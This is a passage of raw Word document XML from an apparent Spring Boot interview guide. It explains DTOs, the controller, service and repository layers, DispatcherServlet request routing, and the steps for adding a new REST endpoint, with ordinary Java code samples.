    </w:p>
    <w:p w14:paraId="1F59DB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54C1A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Long id, String name, String department) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AB922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481341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25C8A3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1D4127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95112B" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CC09D4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45D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ng getId() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F957D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id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AB99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2B3349" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="465B55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Id(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DFA1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76437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8DACBE" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A28A6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Name() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24900B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ame;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450D6B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F5013C" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="083D2E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Name(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E27ADC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4341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1CD49C0" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B9331C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epartment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E718F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94CDFB" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28AED3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Department(String department) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FC58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4CE514E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02F1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3FAAC1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 Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A9C7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controller, when handling a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REST endpoint</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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 that retrieves an employee might return a EmployeeDTO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503662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517F78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432B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employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F802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1697044B" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A8C72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9008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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6468D7AA" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25267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50EEB8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getEmployee(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71259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employeeDTO = employeeService.getEmployeeById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E9C9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loyeeDTO);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EFC3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13DDCA9" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D46F18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5AC69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createEmployee(@RequestBody EmployeeDTO employeeDTO) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72456E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createdEmployee = employeeService.createEmployee(employeeDTO);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBD8E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CREATED).body(createdEmployee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0C0B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1126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11073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rvice Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4E538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service layer, you handle the business logic and may interact with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fetch data from the database. The service layer then converts entities to DTOs and vice versa using either manual mapping or a library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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E7ECC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4C73C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19D03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F8FA5BF" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D6666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0236B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29D9ADFE" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EF4A4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getEmployeeById(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5376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employeeRepository.findById(id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEB90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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1240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to DTO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2F571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4C2CBB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B16E6BF" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="689F2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createEmployee(EmployeeDTO employeeDTO) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE6E8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DTO to entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7A16A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Employee employee = new Employee(employeeDTO.getId(), employeeDTO.getName(), employeeDTO.getDepartment());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC41F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 employeeRepository.save(employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0C41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back to DTO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0047BF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5B85F5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228D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94E5F8"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Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78475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responsible for interacting with the database. You can use Spring Data JPA or any other persistence mechanism to save or retrieve the entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FF55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7890F6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6C48124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3F1BB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 if necessary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBEA6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056B9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apping DTO to Entity (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FD4E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more complex applications, you may want to use a mapping framework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to automate the conversion between DTOs and entities. This helps avoid repetitive code for manual conversion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB7A6B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is a compile-time code generator that simplifies the implementation of mappings between Java bean types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068458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is a runtime mapping library that can automatically map DTOs and entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E320D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using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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0142F5A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 Mapper</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D782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pper(componentModel = "spring")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C2D3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Mapper {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B37300A" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F3AD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toEmployeeDTO(Employee employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40387722" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="513F33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toEmployee(EmployeeDTO employeeDTO);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ACB7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D02C7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you can directly inject the EmployeeMapper into your service layer and use it for mapping between DTOs and entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBD56F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Handling the Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BF4F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nally, when the controller returns the DTO, it is automatically serialized into JSON (or XML, depending on the configuration) and sent to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766BED7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 Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258262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xml:space="preserve"> sends a GET request to http://localhost:8080/api/employees/{id}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1606A1E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outes the request to the corresponding controller method EmployeeController#getEmployee.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177CE3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Service</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is called by the controller to fetch data for the employee.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D35FF8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verts the entity to a DTO (EmployeeDTO).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B993F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EmployeeDTO in the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112EA0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serializes the DTO to JSON and sends it back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C8B3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mple Response</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (JSON format):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B62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8539C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9BFE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2D8375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partment": "Engineering"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2739A68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9B6890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1AB367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DTOs</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are invoked and used in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by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA794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ing the DTO as a simple POJO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFF313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the controller to return DTOs as responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B102E1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processes business logic and maps entities to DTOs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C55F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optionally use mapping libraries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for better code management and automatic mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CECC8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DTOs, you ensure that the client only receives the necessary data and your internal domain structure remains abstracted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668C28FF" w14:textId="579B38A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678" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5378AD86" w14:textId="16E92656"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56" w:name="_Toc197867870"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>I have a URL and I hit the URL, so which is the first class which is invoked in our product</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="656"/>
    </w:p>
    <w:p w14:paraId="3A10F9B1" w14:textId="2DECC0A1"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ispatcherServlet (Front Controller)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381EA8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rst Class Invoked:</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the Spring MVC framework, and it is the first class to receive the HTTP request when a URL is hit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2DB3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defined in the web.xml (if the application is not using Spring Boot) or automatically registered by Spring Boot (if you're using Spring Boot’s embedded servlet container).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733DCD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responsible for routing the request to the appropriate controller and view resolver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FEEA0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It acts as a dispatcher to route the request to the appropriate controller based on the request URL and method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6263D1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DispatcherServlet is automatically configured and initialized by the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot Auto-Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A632AE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HandlerMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3970FAF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receiving the request,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consults the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find the appropriate </w:t>
      </w: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that can handle the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E59A2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erMappings can be of different types, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB88292"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MappingHandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the most common for REST APIs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3475C82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eUrlHandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (used for static resources)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258C1A9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HandlerMapping helps to match the URL with the correct handler (i.e., method in the controller) based on the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE5FDD0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3446C2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ce DispatcherServlet identifies the correct handler method through HandlerMapping, the request is forwarded to the appropriate </w:t>
      </w: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xml:space="preserve"> class (annotated with @RestController or @Controller).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B182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method then processes the request and returns the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D8DE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FCFA6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C20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036CB8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7CF3A6DE" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A557D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2CB0CC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159E01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9A7B3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18C67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6927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http://localhost:8080/api/hello, MyController’s sayHello() method will be invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772118B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Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBDC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request is processed by the controller, the controller might delegate the business logic to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notated with @Service).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACDFD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tains the core business logic and is typically responsible for interacting with repositories and handling more complex operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B914F3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Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7097FC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controller or service layer requires data from a database, it will delegate the task to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usually using Spring Data JPA or similar).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B790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typically annotated with @Repository and interacts with the database to perform CRUD operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2ADB3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the Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692992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Reques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the front controller)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEAA0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determine the appropriate </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>controller method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162E47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Controller Method</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processes the request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08807B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Controller may invok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for business logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441A84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Service Layer invokes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for database access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485517F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38618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hit the URL http://localhost:8080/api/hello, the flow is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7367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eceives the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485BC4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maps the request to MyController.sayHello().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038515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in the controller is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2390334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response (e.g., "Hello, World!").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0CC72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us, the first class invoked is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which is automatically configured by Spring Boot), and it handles routing the request to the appropriate controller method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA9FE3F" w14:textId="3DE729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679" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1D8868" w14:textId="6D96352D" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="004F0738">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="657" w:name="_Toc197867871"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If you have to expose a new endpoint, what steps will you follow</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="657"/>
    </w:p>
    <w:p w14:paraId="44200477" w14:textId="62EBD634"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xpose a new endpoint in a Spring Boot application, here’s the step-by-step process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5831D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a New Controller Class (If Needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217C81B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endpoint belongs to a specific domain or resource, create a new controller class or use an existing one. The controller is responsible for handling incoming HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4089DC7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3DBB2E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E6AEA1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 Common prefix for all endpoints in this controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A321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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3EF36F" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E7" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="790DAD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tep 2: Define the new endpoint (method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCED8E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6647E1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is used to define a common prefix for all API endpoints within this controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A5EE7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 Method to Handle the New Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B9BBA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AC801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 Endpoint to handle GET requests to /api/message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ECC3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Message() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47193D4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2E5054B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CF93E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6868E19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maps HTTP GET requests to /api/message to the getMessage() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA29F2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returns a simple string, which will be sent as the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC000A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andle the Request with Path Variables or Query Parameters (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE588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parameters (e.g., query parameters or path variables), you can add them to the method signature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A88551"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30F69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name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115389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PathVariable String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC22E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50793CF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23A1E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3006BEC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is used to capture the {name} part of the URL and pass it as a method parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD2E54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ternatively, you can use query parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB221E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CC016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RequestParam String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275E75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6DCAD7F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CC1F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6F3C6C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RequestParam is used to extract query parameters like ?name=John from the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111CF3D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the Return Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC45B0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eturn various types from your endpoint, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE3D02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tring</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Plain text or JSON-serializable objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B69C5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Entity</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
